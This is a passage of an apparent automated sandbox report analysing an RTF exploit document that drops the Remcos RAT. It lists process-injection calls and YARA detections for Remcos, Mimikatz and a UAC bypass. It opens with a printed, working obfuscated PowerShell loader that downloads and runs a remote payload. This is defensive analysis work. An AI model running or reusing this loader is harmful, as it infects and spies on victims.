'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,9_2_0041812A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,9_2_0041330D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,9_2_0041BBC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,9_2_0041BB9A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_004167EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043706A9_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004140059_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E11C9_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004541D99_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004381E89_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041F18B9_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004462709_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E34B9_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004533AB9_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042742E9_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004375669_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E5A89_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004387F09_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043797E9_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004339D79_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044DA499_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427AD79_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041DBF39_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427C409_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00437DB39_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00435EEB9_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043DEED9_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00426E9F9_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100171949_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1000B5C19_2_1000B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044B04011_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043610D11_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044731011_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044A49011_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040755A11_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043C56011_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044B61011_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044D6C011_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004476F011_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044B87011_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044081D11_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041495711_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004079EE11_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407AEB11_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044AA8011_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00412AA911_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404B7411_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404B0311_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044BBD811_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404BE511_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404C7611_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00415CFE11_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00416D7211_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00446D3011_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00446D8B11_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00406E8F11_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040503812_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041208C12_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004050A912_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040511A12_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043C13A12_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004051AB12_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044930012_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040D32212_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A4F012_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043A5AB12_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041363112_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044669012_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A73012_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004398D812_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004498E012_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A88612_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043DA0912_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00438D5E12_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00449ED012_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041FE8312_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00430F5412_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004050C213_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014AB13_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040513313_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004051A413_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040124613_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040CA4613_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040523513_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004032C813_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040168913_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402F6013_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                    Source: DSpWOKW7zn.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3580, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: RegAsm.exe PID: 3816, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: bhvB7EA.tmp.11.drBinary or memory string: org.slneighbors
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winRTF@17/19@3/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,11_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,13_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,11_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,9_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$pWOKW7zn.rtfJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-8AXK3L
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR703F.tmpJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
